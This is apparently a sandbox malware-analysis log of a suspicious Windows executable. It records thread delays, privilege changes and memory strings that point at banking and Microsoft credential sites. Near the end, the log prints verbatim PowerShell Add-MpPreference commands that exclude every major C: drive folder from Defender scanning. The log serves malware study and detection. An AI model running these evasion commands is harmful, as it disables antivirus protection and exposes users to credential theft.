Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 590172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589750
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 589153
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588748
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588257
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 588019
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587391
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 587190
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586922
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 586348
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585743
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 585031
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584708
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 584125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583953
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583500
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 583371
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582766
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 582396
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 581172
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579531
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 579022
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578594
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578247
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 578062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 577641
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576484
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 576086
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575939
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575793
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575685
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575395
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575237
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 575122
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574993
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574219
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 574040
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573725
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573437
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 573062
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572828
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572422
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572196
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 572016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 571222
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570984
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570812
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 570547
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 569516
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568687
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568394
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568178
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 568036
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567902
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 567680
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566844
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566699
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566420
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566281
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 566141
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565964
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565816
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565702
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565509
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565406
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565199
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 565014
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564781
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564669
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564560
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564452
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564343
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 564016
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563906
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563797
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563683
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563566
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563453
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563341
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563234
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 563125
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 562002
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561887
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561780
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561672
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561562
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561438
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561328
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561157
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 561047
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560934
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560817
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560703
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 560585
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559885
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 559757
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\smartscreen.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: YtBWM7vFD0.36.dr Binary or memory string: discord.comVMware20,11696428655f
Source: YtBWM7vFD0.36.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: global block list test formVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2256096642.000000001B25B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: YtBWM7vFD0.36.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: YtBWM7vFD0.36.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: YtBWM7vFD0.36.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: YtBWM7vFD0.36.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: YtBWM7vFD0.36.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: YtBWM7vFD0.36.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: YtBWM7vFD0.36.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: YtBWM7vFD0.36.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, 00000000.00000002.2260842550.000000001D87A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_
Source: YtBWM7vFD0.36.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: w32tm.exe, 00000034.00000002.2297376786.000001E2D0F19000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: YtBWM7vFD0.36.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: YtBWM7vFD0.36.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: YtBWM7vFD0.36.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: YtBWM7vFD0.36.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: YtBWM7vFD0.36.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: YtBWM7vFD0.36.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: YtBWM7vFD0.36.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process token adjusted: Debug
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process token adjusted: Debug
Source: C:\Users\user\Downloads\smartscreen.exe Process token adjusted: Debug
Source: C:\Users\user\Downloads\smartscreen.exe Process token adjusted: Debug
Source: C:\Recovery\WmiPrvSE.exe Process token adjusted: Debug
Source: C:\Recovery\WmiPrvSE.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
